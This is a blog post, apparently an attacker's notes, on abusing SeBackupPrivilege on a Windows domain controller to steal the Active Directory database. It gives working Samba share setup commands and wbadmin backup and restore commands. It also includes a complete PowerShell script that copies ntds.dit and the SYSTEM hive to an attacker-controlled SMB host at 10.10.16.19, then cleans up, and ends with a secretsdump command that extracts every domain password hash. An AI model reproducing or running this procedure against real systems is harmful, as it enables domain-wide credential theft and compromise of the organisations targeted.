Abusing SeBackupPrivilege

rootsecdev
2 min read · Jan 1, 2023


Want to natively abuse SeBackupPrivilege on a domain controller to back up ntds.dit and extract the hashes offline (using Kali)?

Here are my notes:

Modify the contents of /etc/samba/smb.conf to the following (note that the interfaces line only limits which interfaces smbd binds to when bind interfaces only = yes is also set; without it the share is reachable on every interface):

[global]
; restrict to the VPN adapter if needed
interfaces = tun0

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browseable = yes
force user = smbuser

Create a new user that matches the user in the force user parameter:

sudo adduser smbuser

You will be prompted to set a Unix password for the account; these notes use:
Hacktheplanet!

Next, set a Samba password for the new user (Samba keeps its own password database, separate from /etc/shadow, so this step is required even though adduser already set a password):

sudo smbpasswd -a smbuser

Then restart the SMB daemon so the new share is served: sudo service smbd restart

On the compromised server, map a network drive to the share set up in the previous step (this also caches the credentials for the UNC path used by the later commands):

net use k: \\10.10.16.19\smb /user:smbuser "Hacktheplanet!"

On the WinRM shell, we can back up the NTDS folder with wbadmin. wbadmin is only present if the Windows Server Backup feature is installed, which it is not by default; the piped "Y" answers the confirmation prompt:

echo "Y" | wbadmin start backup -backuptarget:\\10.10.16.19\smb -include:c:\windows\ntds

Now check versions of backups:

wbadmin get versions

Figure 1 — Listing Backup Versions

Now restore ntds.dit to c:\ (this lets us copy ntds.dit to our attacker system). The -version value must match the "Version identifier" printed by wbadmin get versions, and -notrestoreacl keeps the restored file from inheriting the original NTDS ACLs, so our account can read it:

echo "Y" | wbadmin start recovery -version:01/01/2023-22:55 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl

Confirm the restore to c:\ :

Figure 2 — Confirming restored backup

Save the SYSTEM hive to c:\ as well; it holds the boot key needed to decrypt the hashes stored in ntds.dit:

reg save HKLM\SYSTEM C:\system.hive

Exfil both files to the SMB share (cp is a PowerShell alias for Copy-Item; the restored ntds.dit sits at C:\ntds.dit):

cp C:\ntds.dit \\10.10.16.19\smb\NTDS.dit
cp C:\system.hive \\10.10.16.19\smb\system.hive
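The DC-side steps above, from mapping the share through exfil, as one PowerShell script for the WinRM shell. This is an added example, not code from the original post: the share, user and password are placeholders for your own Kali setup, and it assumes wbadmin lists versions oldest first, so the last "Version identifier" is the backup just taken. It uses -quiet instead of piping "Y" and checks for SeBackupPrivilege and wbadmin before doing anything noisy.

```powershell
# Added example (not from the original post): the DC-side procedure in one script.
# Assumptions: share/user/password below are placeholders for your own Kali host;
# 'wbadmin get versions' prints versions oldest first.

$Share   = '\\10.10.16.19\smb'
$SmbUser = 'smbuser'
$SmbPass = 'Hacktheplanet!'

# Stop early if the token does not hold SeBackupPrivilege at all
# (whoami lists it even when disabled; wbadmin enables it itself).
if (-not ((whoami /priv) -match 'SeBackupPrivilege')) {
    throw 'Current token does not have SeBackupPrivilege.'
}

# wbadmin only exists when the Windows-Server-Backup feature is installed.
if (-not (Get-Command wbadmin.exe -ErrorAction SilentlyContinue)) {
    throw 'wbadmin.exe not found; the Windows-Server-Backup feature is not installed.'
}

# Map the share so the credentials are cached for the UNC path used below
# (documented net use order: share, password, then /user:).
net use K: $Share $SmbPass "/user:$SmbUser" | Out-Null
if ($LASTEXITCODE -ne 0) { throw "net use failed with exit code $LASTEXITCODE" }

# Back up the NTDS folder to the share; -quiet replaces the piped "Y".
wbadmin start backup "-backuptarget:$Share" '-include:C:\Windows\NTDS' -quiet
if ($LASTEXITCODE -ne 0) { throw "wbadmin backup failed with exit code $LASTEXITCODE" }

# Pull the version identifier of the backup just taken from 'wbadmin get versions'.
$versions = wbadmin get versions | Out-String
$ids = [regex]::Matches($versions, 'Version identifier:\s*(\S+)') |
       ForEach-Object { $_.Groups[1].Value }
if (-not $ids) { throw 'wbadmin get versions returned no version identifiers.' }
$latest = @($ids)[-1]   # assumption: newest backup is listed last

# Restore only ntds.dit, to C:\, without its original ACL so our account can read it.
wbadmin start recovery "-version:$latest" '-itemtype:file' `
    '-items:C:\Windows\NTDS\ntds.dit' '-recoverytarget:C:\' -notrestoreacl -quiet
if ($LASTEXITCODE -ne 0) { throw "wbadmin recovery failed with exit code $LASTEXITCODE" }

# The SYSTEM hive carries the boot key needed to decrypt the hashes in ntds.dit.
reg save HKLM\SYSTEM C:\system.hive /y | Out-Null
if ($LASTEXITCODE -ne 0) { throw "reg save failed with exit code $LASTEXITCODE" }

# Exfil both files to the share (they land in /tmp/ on Kali).
Copy-Item -Path C:\ntds.dit    -Destination "$Share\NTDS.dit"
Copy-Item -Path C:\system.hive -Destination "$Share\system.hive"

# Tidy up the local copies and the mapping (not in the post; skip if still needed).
Remove-Item C:\ntds.dit, C:\system.hive -Force
net use K: /delete /y | Out-Null

Write-Host "Done. On Kali: impacket-secretsdump -ntds /tmp/NTDS.dit -system /tmp/system.hive LOCAL"
```

The backup catalog and the Windows Server Backup event log entries remain on the DC after this runs, so expect a blue team to see the wbadmin activity; the script does not try to hide it.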

On Kali, extract the hashes with Impacket's secretsdump against the two files that landed in /tmp/ (the LOCAL keyword tells it to parse the offline files instead of talking to a live target):

impacket-secretsdump -ntds /tmp/NTDS.dit -system /tmp/system.hive LOCAL
